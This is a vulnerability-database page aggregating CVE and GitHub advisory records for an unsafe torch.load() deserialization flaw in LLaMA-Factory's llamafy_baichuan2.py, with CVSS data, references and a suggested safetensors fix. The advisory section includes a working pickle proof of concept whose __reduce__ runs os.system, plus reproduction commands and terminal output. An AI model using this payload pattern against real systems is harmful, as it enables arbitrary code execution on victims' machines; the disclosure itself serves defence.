Vulnerability-Lookup

CVE-2025-46567 (GCVE-0-2025-46567)

Vulnerability from cvelistv5 – Published: 2025-05-01 17:20 – Updated: 2025-05-02 17:29

Title

LLaMA-Factory Allows Arbitrary Code Execution via Unsafe Deserialization in Ilamafy_baichuan2.py

Summary

LLama Factory enables fine-tuning of large language models. Prior to version 1.0.0, a critical vulnerability exists in the `llamafy_baichuan2.py` script of the LLaMA-Factory project. The script performs insecure deserialization using `torch.load()` on user-supplied `.bin` files from an input directory. An attacker can exploit this behavior by crafting a malicious `.bin` file that executes arbitrary commands during deserialization. This issue has been patched in version 1.0.0.

Severity ?

6.1 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L

CWE

CWE-502 - Deserialization of Untrusted Data

Assigner

GitHub_M

References

URL

Tags

	https://github.com/hiyouga/LLaMA-Factory/security…	x_refsource_CONFIRM
	https://github.com/hiyouga/LLaMA-Factory/commit/2…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	hiyouga	LLaMA-Factory	Affected: < 1.0.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-46567",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-05-02T17:29:42.693942Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-05-02T17:29:45.664Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-f2f7-gj54-6vpv"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "LLaMA-Factory",
          "vendor": "hiyouga",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.0.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "LLama Factory enables fine-tuning of large language models. Prior to version 1.0.0, a critical vulnerability exists in the `llamafy_baichuan2.py` script of the LLaMA-Factory project. The script performs insecure deserialization using `torch.load()` on user-supplied `.bin` files from an input directory. An attacker can exploit this behavior by crafting a malicious `.bin` file that executes arbitrary commands during deserialization. This issue has been patched in version 1.0.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "LOW",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-502",
              "description": "CWE-502: Deserialization of Untrusted Data",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-01T17:20:41.020Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-f2f7-gj54-6vpv",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-f2f7-gj54-6vpv"
        },
        {
          "name": "https://github.com/hiyouga/LLaMA-Factory/commit/2989d39239d2f46e584c1e1180ba46b9768afb2a",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/hiyouga/LLaMA-Factory/commit/2989d39239d2f46e584c1e1180ba46b9768afb2a"
        }
      ],
      "source": {
        "advisory": "GHSA-f2f7-gj54-6vpv",
        "discovery": "UNKNOWN"
      },
      "title": "LLaMA-Factory Allows Arbitrary Code Execution via Unsafe Deserialization in Ilamafy_baichuan2.py"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-46567",
    "datePublished": "2025-05-01T17:20:41.020Z",
    "dateReserved": "2025-04-24T21:10:48.175Z",
    "dateUpdated": "2025-05-02T17:29:45.664Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-46567\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-05-01T18:15:58.117\",\"lastModified\":\"2025-06-17T14:19:39.290\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"LLama Factory enables fine-tuning of large language models. Prior to version 1.0.0, a critical vulnerability exists in the `llamafy_baichuan2.py` script of the LLaMA-Factory project. The script performs insecure deserialization using `torch.load()` on user-supplied `.bin` files from an input directory. An attacker can exploit this behavior by crafting a malicious `.bin` file that executes arbitrary commands during deserialization. This issue has been patched in version 1.0.0.\"},{\"lang\":\"es\",\"value\":\"LLama Factory permite el ajuste fino de modelos de lenguaje grandes. Antes de la versi\u00f3n 1.0.0, exist\u00eda una vulnerabilidad cr\u00edtica en el script `llamafy_baichuan2.py` del proyecto LLaMA-Factory. Este script realiza una deserializaci\u00f3n insegura mediante `torch.load()` en archivos `.bin` proporcionados por el usuario desde un directorio de entrada. Un atacante puede explotar este comportamiento manipulando un archivo `.bin` malicioso que ejecute comandos arbitrarios durante la deserializaci\u00f3n. Este problema se ha corregido en la versi\u00f3n 1.0.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L\",\"baseScore\":6.1,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":1.3,\"impactScore\":4.7},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-502\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:hiyouga:llama-factory:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.0.0\",\"matchCriteriaId\":\"CCE62620-4488-49A9-BA7B-C8E2790768AC\"}]}]}],\"references\":[{\"url\":\"https://github.com/hiyouga/LLaMA-Factory/commit/2989d39239d2f46e584c1e1180ba46b9768afb2a\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-f2f7-gj54-6vpv\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-f2f7-gj54-6vpv\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-46567\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-05-02T17:29:42.693942Z\"}}}], \"references\": [{\"url\": \"https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-f2f7-gj54-6vpv\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-05-02T17:29:37.760Z\"}}], \"cna\": {\"title\": \"LLaMA-Factory Allows Arbitrary Code Execution via Unsafe Deserialization in Ilamafy_baichuan2.py\", \"source\": {\"advisory\": \"GHSA-f2f7-gj54-6vpv\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.1, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"hiyouga\", \"product\": \"LLaMA-Factory\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.0.0\"}]}], \"references\": [{\"url\": \"https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-f2f7-gj54-6vpv\", \"name\": \"https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-f2f7-gj54-6vpv\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/hiyouga/LLaMA-Factory/commit/2989d39239d2f46e584c1e1180ba46b9768afb2a\", \"name\": \"https://github.com/hiyouga/LLaMA-Factory/commit/2989d39239d2f46e584c1e1180ba46b9768afb2a\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"LLama Factory enables fine-tuning of large language models. Prior to version 1.0.0, a critical vulnerability exists in the `llamafy_baichuan2.py` script of the LLaMA-Factory project. The script performs insecure deserialization using `torch.load()` on user-supplied `.bin` files from an input directory. An attacker can exploit this behavior by crafting a malicious `.bin` file that executes arbitrary commands during deserialization. This issue has been patched in version 1.0.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-502\", \"description\": \"CWE-502: Deserialization of Untrusted Data\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-05-01T17:20:41.020Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-46567\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-05-02T17:29:45.664Z\", \"dateReserved\": \"2025-04-24T21:10:48.175Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-05-01T17:20:41.020Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-F2F7-GJ54-6VPV

Vulnerability from github – Published: 2025-04-23 22:21 – Updated: 2025-06-28 00:04

Summary

LLaMA-Factory Allows Arbitrary Code Execution via Unsafe Deserialization in Ilamafy_baichuan2.py

Details

Description

A critical vulnerability exists in the llamafy_baichuan2.py script of the LLaMA-Factory project. The script performs insecure deserialization using torch.load() on user-supplied .bin files from an input directory. An attacker can exploit this behavior by crafting a malicious .bin file that executes arbitrary commands during deserialization.

Attack Vector

This vulnerability is exploitable without authentication or privileges when a user is tricked into:

Downloading or cloning a malicious project folder containing a crafted .bin file (e.g. via zip file, GitHub repo).
Running the provided conversion script llamafy_baichuan2.py, either manually or as part of an example workflow.

No elevated privileges are required. The user only needs to run the script with an attacker-supplied --input_dir.

Impact

Arbitrary command execution (RCE)
System compromise
Persistence or lateral movement in shared compute environments

Proof of Concept (PoC)

# malicious_payload.py
import torch, pickle, os

class MaliciousPayload:
    def __reduce__(self):
        return (os.system, ("mkdir HACKED!",))  # Arbitrary command

malicious_data = {
    "v_head.summary.weight": MaliciousPayload(),
    "v_head.summary.bias": torch.randn(10)
}

with open("value_head.bin", "wb") as f:
    pickle.dump(malicious_data, f)

An example of config.json:

{
  "model": "value_head.bin",
  "hidden_size": 4096,
  "num_attention_heads": 32,
  "num_hidden_layers": 24,
  "initializer_range": 0.02,
  "intermediate_size": 11008,
  "max_position_embeddings": 4096,
  "kv_channels": 128,
  "layer_norm_epsilon": 1e-5,
  "tie_word_embeddings": false,
  "vocab_size": 151936
}

(base) root@d6ab70067470:~/LLaMA-Factory_latest# tree
.
`-- LLaMA-Factory
    |-- LICENSE
    |-- README.md
    |-- malicious_folder
    |   |-- config.json
    |   `-- value_head.bin
    `-- xxxxx(Irrelevant documents omitted)

# Reproduction
python scripts/convert_ckpt/llamafy_baichuan2.py --input_dir ./malicious_folder --output_dir ./out

➡️ Running this will execute the malicious payload and create a HACKED! folder.

(base) root@d6ab70067470:~/LLaMA-Factory_latest/LLaMA-Factory# ls
CITATION.cff  LICENSE  MANIFEST.in  Makefile  README.md  README_zh.md  assets  data  docker  evaluation  examples  malicious_folder  pyproject.toml  requirements.txt  scripts  setup.py  src  tests
(base) root@d6ab70067470:~/LLaMA-Factory_latest/LLaMA-Factory# python scripts/convert_ckpt/llamafy_baichuan2.py --input_dir ./malicious_folder --output_dir ./out
2025-04-23 07:36:58.435304: E external/local_xla/xla/stream_executor/cuda/cuda_fft.cc:477] Unable to register cuFFT factory: Attempting to register factory for plugin cuFFT when one has already been registered
WARNING: All log messages before absl::InitializeLog() is called are written to STDERR
E0000 00:00:1745393818.451398    1008 cuda_dnn.cc:8310] Unable to register cuDNN factory: Attempting to register factory for plugin cuDNN when one has already been registered
E0000 00:00:1745393818.456423    1008 cuda_blas.cc:1418] Unable to register cuBLAS factory: Attempting to register factory for plugin cuBLAS when one has already been registered
2025-04-23 07:36:58.472951: I tensorflow/core/platform/cpu_feature_guard.cc:210] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.
To enable the following instructions: AVX2 FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.
Load weights:  50%|██████████████████████████████████████████████████████████████████████████████████▌                                                                                  | 1/2 [00:00<00:00, 123.70it/s]
Traceback (most recent call last):
  File "/root/LLaMA-Factory_latest/LLaMA-Factory/scripts/convert_ckpt/llamafy_baichuan2.py", line 112, in <module>
    fire.Fire(llamafy_baichuan2)
  File "/root/miniconda3/lib/python3.12/site-packages/fire/core.py", line 135, in Fire
    component_trace = _Fire(component, args, parsed_flag_args, context, name)
                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/root/miniconda3/lib/python3.12/site-packages/fire/core.py", line 468, in _Fire
    component, remaining_args = _CallAndUpdateTrace(
                                ^^^^^^^^^^^^^^^^^^^^
  File "/root/miniconda3/lib/python3.12/site-packages/fire/core.py", line 684, in _CallAndUpdateTrace
    component = fn(*varargs, **kwargs)
                ^^^^^^^^^^^^^^^^^^^^^^
  File "/root/LLaMA-Factory_latest/LLaMA-Factory/scripts/convert_ckpt/llamafy_baichuan2.py", line 107, in llamafy_baichuan2
    save_weight(input_dir, output_dir, shard_size, save_safetensors)
  File "/root/LLaMA-Factory_latest/LLaMA-Factory/scripts/convert_ckpt/llamafy_baichuan2.py", line 35, in save_weight
    shard_weight = torch.load(os.path.join(input_dir, filepath), map_location="cpu")
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/root/miniconda3/lib/python3.12/site-packages/torch/serialization.py", line 1040, in load
    return _legacy_load(opened_file, map_location, pickle_module, **pickle_load_args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/root/miniconda3/lib/python3.12/site-packages/torch/serialization.py", line 1260, in _legacy_load
    raise RuntimeError("Invalid magic number; corrupt file?")
RuntimeError: Invalid magic number; corrupt file?
(base) root@d6ab70067470:~/LLaMA-Factory_latest/LLaMA-Factory# ls
 CITATION.cff   LICENSE       Makefile    README_zh.md   data     evaluation   malicious_folder   pyproject.toml     scripts    src
'HACKED!'       MANIFEST.in   README.md   assets         docker   examples     out                requirements.txt   setup.py   tests

Affected File(s)

https://github.com/hiyouga/LLaMA-Factory/blob/main/scripts/convert_ckpt/llamafy_baichuan2.py#L35
scripts/convert_ckpt/llamafy_baichuan2.py
Line: torch.load(os.path.join(input_dir, filepath), map_location="cpu")

Suggested Fix

Replace torch.load() with safer alternatives like safetensors.
Validate and whitelist file types before deserialization.
Require checksum validation.

Example patch:

# Replace torch.load() with safe deserialization
try:
    from safetensors.torch import load_file
    tensor_data = load_file(filepath)
except Exception:
    print("Invalid or unsafe checkpoint file.")
    return

Workarounds

Avoid running the script with untrusted .bin files.
Use containers or VMs to isolate script execution.

References

Credits

Discovered and reported by Yu Rong and Hao Fan, 2025-04-23

Severity ?

6.1 (Medium)


                  
                    CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.9.2"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "llamafactory"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-46567"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-23T22:21:13Z",
    "nvd_published_at": "2025-05-01T18:15:58Z",
    "severity": "MODERATE"
  },
  "details": "### Description\n\nA critical vulnerability exists in the `llamafy_baichuan2.py` script of the [LLaMA-Factory](https://github.com/hiyouga/LLaMA-Factory) project. The script performs insecure deserialization using `torch.load()` on user-supplied `.bin` files from an input directory. An attacker can exploit this behavior by crafting a malicious `.bin` file that executes arbitrary commands during deserialization.\n\n### Attack Vector\n\nThis vulnerability is **exploitable without authentication or privileges** when a user is tricked into:\n\n1. Downloading or cloning a malicious project folder containing a crafted `.bin` file (e.g. via zip file, GitHub repo).\n2. Running the provided conversion script `llamafy_baichuan2.py`, either manually or as part of an example workflow.\n\nNo elevated privileges are required. The user only needs to run the script with an attacker-supplied `--input_dir`. \n\n### Impact\n\n- Arbitrary command execution (RCE)\n- System compromise\n- Persistence or lateral movement in shared compute environments\n\n\n### Proof of Concept (PoC)\n\n```python\n# malicious_payload.py\nimport torch, pickle, os\n\nclass MaliciousPayload:\n    def __reduce__(self):\n        return (os.system, (\"mkdir HACKED!\",))  # Arbitrary command\n\nmalicious_data = {\n    \"v_head.summary.weight\": MaliciousPayload(),\n    \"v_head.summary.bias\": torch.randn(10)\n}\n\nwith open(\"value_head.bin\", \"wb\") as f:\n    pickle.dump(malicious_data, f)\n```\n\nAn example of `config.json`:\n\n```json\n{\n  \"model\": \"value_head.bin\",\n  \"hidden_size\": 4096,\n  \"num_attention_heads\": 32,\n  \"num_hidden_layers\": 24,\n  \"initializer_range\": 0.02,\n  \"intermediate_size\": 11008,\n  \"max_position_embeddings\": 4096,\n  \"kv_channels\": 128,\n  \"layer_norm_epsilon\": 1e-5,\n  \"tie_word_embeddings\": false,\n  \"vocab_size\": 151936\n}\n```\n\n```bash\n(base) root@d6ab70067470:~/LLaMA-Factory_latest# tree\n.\n`-- LLaMA-Factory\n    |-- LICENSE\n    |-- README.md\n    |-- malicious_folder\n    |   |-- config.json\n    |   `-- value_head.bin\n    `-- xxxxx(Irrelevant documents omitted)\n```\n\n\n```bash\n# Reproduction\npython scripts/convert_ckpt/llamafy_baichuan2.py --input_dir ./malicious_folder --output_dir ./out\n```\n\n\u27a1\ufe0f Running this will execute the malicious payload and create a `HACKED!` folder.\n\n```bash\n(base) root@d6ab70067470:~/LLaMA-Factory_latest/LLaMA-Factory# ls\nCITATION.cff  LICENSE  MANIFEST.in  Makefile  README.md  README_zh.md  assets  data  docker  evaluation  examples  malicious_folder  pyproject.toml  requirements.txt  scripts  setup.py  src  tests\n(base) root@d6ab70067470:~/LLaMA-Factory_latest/LLaMA-Factory# python scripts/convert_ckpt/llamafy_baichuan2.py --input_dir ./malicious_folder --output_dir ./out\n2025-04-23 07:36:58.435304: E external/local_xla/xla/stream_executor/cuda/cuda_fft.cc:477] Unable to register cuFFT factory: Attempting to register factory for plugin cuFFT when one has already been registered\nWARNING: All log messages before absl::InitializeLog() is called are written to STDERR\nE0000 00:00:1745393818.451398    1008 cuda_dnn.cc:8310] Unable to register cuDNN factory: Attempting to register factory for plugin cuDNN when one has already been registered\nE0000 00:00:1745393818.456423    1008 cuda_blas.cc:1418] Unable to register cuBLAS factory: Attempting to register factory for plugin cuBLAS when one has already been registered\n2025-04-23 07:36:58.472951: I tensorflow/core/platform/cpu_feature_guard.cc:210] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.\nTo enable the following instructions: AVX2 FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.\nLoad weights:  50%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u258c                                                                                  | 1/2 [00:00\u003c00:00, 123.70it/s]\nTraceback (most recent call last):\n  File \"/root/LLaMA-Factory_latest/LLaMA-Factory/scripts/convert_ckpt/llamafy_baichuan2.py\", line 112, in \u003cmodule\u003e\n    fire.Fire(llamafy_baichuan2)\n  File \"/root/miniconda3/lib/python3.12/site-packages/fire/core.py\", line 135, in Fire\n    component_trace = _Fire(component, args, parsed_flag_args, context, name)\n                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/root/miniconda3/lib/python3.12/site-packages/fire/core.py\", line 468, in _Fire\n    component, remaining_args = _CallAndUpdateTrace(\n                                ^^^^^^^^^^^^^^^^^^^^\n  File \"/root/miniconda3/lib/python3.12/site-packages/fire/core.py\", line 684, in _CallAndUpdateTrace\n    component = fn(*varargs, **kwargs)\n                ^^^^^^^^^^^^^^^^^^^^^^\n  File \"/root/LLaMA-Factory_latest/LLaMA-Factory/scripts/convert_ckpt/llamafy_baichuan2.py\", line 107, in llamafy_baichuan2\n    save_weight(input_dir, output_dir, shard_size, save_safetensors)\n  File \"/root/LLaMA-Factory_latest/LLaMA-Factory/scripts/convert_ckpt/llamafy_baichuan2.py\", line 35, in save_weight\n    shard_weight = torch.load(os.path.join(input_dir, filepath), map_location=\"cpu\")\n                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/root/miniconda3/lib/python3.12/site-packages/torch/serialization.py\", line 1040, in load\n    return _legacy_load(opened_file, map_location, pickle_module, **pickle_load_args)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/root/miniconda3/lib/python3.12/site-packages/torch/serialization.py\", line 1260, in _legacy_load\n    raise RuntimeError(\"Invalid magic number; corrupt file?\")\nRuntimeError: Invalid magic number; corrupt file?\n(base) root@d6ab70067470:~/LLaMA-Factory_latest/LLaMA-Factory# ls\n CITATION.cff   LICENSE       Makefile    README_zh.md   data     evaluation   malicious_folder   pyproject.toml     scripts    src\n\u0027HACKED!\u0027       MANIFEST.in   README.md   assets         docker   examples     out                requirements.txt   setup.py   tests\n```\n\n### Affected File(s)\n\n- https://github.com/hiyouga/LLaMA-Factory/blob/main/scripts/convert_ckpt/llamafy_baichuan2.py#L35\n- `scripts/convert_ckpt/llamafy_baichuan2.py`\n- Line: `torch.load(os.path.join(input_dir, filepath), map_location=\"cpu\")`\n\n### Suggested Fix\n\n- Replace `torch.load()` with safer alternatives like `safetensors`.\n- Validate and whitelist file types before deserialization.\n- Require checksum validation.\n\nExample patch:\n\n```python\n# Replace torch.load() with safe deserialization\ntry:\n    from safetensors.torch import load_file\n    tensor_data = load_file(filepath)\nexcept Exception:\n    print(\"Invalid or unsafe checkpoint file.\")\n    return\n```\n\n### Workarounds\n\n- Avoid running the script with untrusted `.bin` files.\n- Use containers or VMs to isolate script execution.\n\n### References\n\n- [torch.load() \u2014 PyTorch Docs](https://pytorch.org/docs/stable/generated/torch.load.html)\n- [CWE-502: Deserialization of Untrusted Data](https://cwe.mitre.org/data/definitions/502.html)\n\n### Credits\n\nDiscovered and reported by [Yu Rong](https://github.com/Anchor0221) and [Hao Fan](https://github.com/xhjy2020), 2025-04-23",
  "id": "GHSA-f2f7-gj54-6vpv",
  "modified": "2025-06-28T00:04:00Z",
  "published": "2025-04-23T22:21:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-f2f7-gj54-6vpv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46567"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hiyouga/LLaMA-Factory/commit/2989d39239d2f46e584c1e1180ba46b9768afb2a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/hiyouga/LLaMA-Factory"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hiyouga/LLaMA-Factory/blob/main/scripts/convert_ckpt/llamafy_baichuan2.py#L35"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "LLaMA-Factory Allows Arbitrary Code Execution via Unsafe Deserialization in Ilamafy_baichuan2.py"
}

FKIE_CVE-2025-46567

Vulnerability from fkie_nvd - Published: 2025-05-01 18:15 - Updated: 2025-06-17 14:19

Severity ?

6.1 (Medium) - CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L
7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/hiyouga/LLaMA-Factory/commit/2989d39239d2f46e584c1e1180ba46b9768afb2a	Patch
security-advisories@github.com	https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-f2f7-gj54-6vpv	Exploit, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-f2f7-gj54-6vpv	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	hiyouga	llama-factory	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:hiyouga:llama-factory:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "CCE62620-4488-49A9-BA7B-C8E2790768AC",
              "versionEndExcluding": "1.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "LLama Factory enables fine-tuning of large language models. Prior to version 1.0.0, a critical vulnerability exists in the `llamafy_baichuan2.py` script of the LLaMA-Factory project. The script performs insecure deserialization using `torch.load()` on user-supplied `.bin` files from an input directory. An attacker can exploit this behavior by crafting a malicious `.bin` file that executes arbitrary commands during deserialization. This issue has been patched in version 1.0.0."
    },
    {
      "lang": "es",
      "value": "LLama Factory permite el ajuste fino de modelos de lenguaje grandes. Antes de la versi\u00f3n 1.0.0, exist\u00eda una vulnerabilidad cr\u00edtica en el script `llamafy_baichuan2.py` del proyecto LLaMA-Factory. Este script realiza una deserializaci\u00f3n insegura mediante `torch.load()` en archivos `.bin` proporcionados por el usuario desde un directorio de entrada. Un atacante puede explotar este comportamiento manipulando un archivo `.bin` malicioso que ejecute comandos arbitrarios durante la deserializaci\u00f3n. Este problema se ha corregido en la versi\u00f3n 1.0.0."
    }
  ],
  "id": "CVE-2025-46567",
  "lastModified": "2025-06-17T14:19:39.290",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "LOW",
          "baseScore": 6.1,
